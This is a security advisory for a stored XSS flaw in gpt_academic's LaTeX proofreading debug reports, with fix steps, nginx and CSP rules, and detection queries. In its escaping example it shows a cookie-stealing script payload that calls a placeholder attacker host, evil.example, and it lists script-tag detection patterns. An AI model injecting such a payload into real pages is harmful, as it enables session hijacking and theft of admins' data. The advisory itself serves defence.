CVE-2025-0183
📋 TL;DR
A stored XSS vulnerability in the Latex Proof-Reading Module of binary-husky/gpt_academic allows attackers to inject malicious scripts into debug_log.html files. When an administrator views these debug reports, the scripts execute in their browser, potentially enabling unauthorized actions. Version 3.9.0 with the module enabled is affected.
💻 Affected Systems
- binary-husky/gpt_academic
📦 What is this software?
gpt_academic (GPT Academic) by binary-husky is an open-source web application that wraps large language models in a browser UI for academic reading, writing, and LaTeX proofreading and translation.
⚠️ Risk & Real-World Impact
Worst Case
Admin session hijacking leading to complete system compromise, data theft, or ransomware deployment through admin privileges.
Likely Case
Session theft allowing attacker to perform unauthorized actions as admin, potentially accessing sensitive data or modifying configurations.
If Mitigated
Limited impact if proper input validation and output encoding are implemented, restricting script execution.
🎯 Exploit Status
Exploitation requires the ability to inject a payload into debug_log.html; an administrator must then view the file. Public details are available via the huntr.com reference.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: later than 3.9.0 (check the latest release)
Vendor Advisory: https://huntr.com/bounties/53bced90-64a9-4ca2-8f2f-282c4ce84d1f
Restart Required: No
Instructions:
1. Update to the latest version of gpt_academic.
2. Verify the Latex Proof-Reading Module properly sanitizes input.
3. Remove any existing debug_log.html files.
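As a rough illustration of the output encoding the fix requires, the sketch below (hypothetical helper name and report layout; gpt_academic's actual implementation may differ) HTML-escapes user-supplied LaTeX content before writing it into a debug report, so an injected script tag renders as inert text:

```python
import html

def write_debug_log(entries, path="debug_log.html"):
    """Write a minimal debug report, HTML-escaping every user-supplied
    value so injected <script> tags render as literal text."""
    rows = "\n".join(
        f"<li><pre>{html.escape(entry)}</pre></li>" for entry in entries
    )
    with open(path, "w", encoding="utf-8") as f:
        f.write(f"<html><body><ul>\n{rows}\n</ul></body></html>")

# A payload like this is neutralized: the browser shows the tag literally
# instead of executing it.
payload = '<script>fetch("https://evil.example/?c="+document.cookie)</script>'
write_debug_log([payload], "/tmp/debug_log.html")
```

`html.escape` converts `<`, `>`, `&`, and quotes into entities, which is sufficient for text placed inside an element body; attribute and URL contexts need additional care.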
🔧 Temporary Workarounds
Disable debug logging
Applies to: all platforms. Prevent generation of debug_log.html files by disabling debug functionality in the Latex Proof-Reading Module.
Modify configuration to disable debug logging in the module settings
Restrict access to debug files
Applies to: Linux. Block web access to debug_log.html files via web server configuration.
Add deny rule for debug_log.html in nginx/apache config
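For nginx, a rule along these lines (a sketch; adjust the path pattern to your deployment, and note it only helps if a web server actually fronts the application) refuses any request for a debug log:

```nginx
# Deny direct web access to generated debug reports.
location ~* /debug_log\.html$ {
    deny all;
    return 404;
}
```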
🧯 If You Can't Patch
- Implement strict Content Security Policy (CSP) headers to prevent script execution from untrusted sources.
- Regularly audit and sanitize debug_log.html files, removing any suspicious content.
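A restrictive CSP, for example set by a fronting reverse proxy, blocks inline script execution even if a payload reaches the rendered page. An illustrative nginx directive (tighten or relax the policy to match what the application's own pages legitimately need):

```nginx
# Disallow inline scripts; an injected <script> block will not execute.
add_header Content-Security-Policy "default-src 'self'; script-src 'self'" always;
```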
🔍 How to Verify
Check if Vulnerable:
Check if version is 3.9.0 and Latex Proof-Reading Module generates debug_log.html files without proper input sanitization.
Check Version:
gpt_academic is typically run from a cloned repository rather than installed as a Python package, so importing it with `python -c` may fail; check the `version` file in the project root or the git tag of your checkout instead.
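If you run from a cloned repository, the version can be read from the top-level `version` file, which recent releases store as a JSON document (the `version` key name is an assumption; verify against your checkout):

```python
import json

def read_gpt_academic_version(repo_root="."):
    """Read the version number from gpt_academic's top-level `version`
    file (assumed to be a JSON document with a "version" key)."""
    with open(f"{repo_root}/version", encoding="utf-8") as f:
        return json.load(f).get("version")
```

Usage: `print(read_gpt_academic_version("/path/to/gpt_academic"))`.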
Verify Fix Applied:
Test if script tags in Latex input are properly encoded in generated debug_log.html output.
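One quick, imperfect check is to scan a generated report for raw (unescaped) script markup. This is a crude regex heuristic, not a full XSS scanner, and it will false-positive if the module's own template legitimately uses `<script>`:

```python
import re

def report_looks_unsafe(html_text: str) -> bool:
    """Return True if the report contains a raw <script> tag or a
    javascript: URL. Escaped payloads (&lt;script&gt;) do not match."""
    return bool(re.search(r"<script\b|javascript:", html_text, re.IGNORECASE))

# An escaped payload passes; a raw one is flagged.
assert not report_looks_unsafe("&lt;script&gt;alert(1)&lt;/script&gt;")
assert report_looks_unsafe("<script>alert(1)</script>")
```

Run it against every debug_log.html on disk after submitting a harmless test payload such as `<script>alert(1)</script>` through the module.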
📡 Detection & Monitoring
Log Indicators:
- Unusual script tags or JavaScript in debug_log.html files
- Admin accessing debug reports with suspicious parameters
Network Indicators:
- HTTP requests to debug_log.html with encoded payloads
SIEM Query:
source="web_logs" AND uri="*debug_log.html*" AND (content="<script>" OR content="javascript:")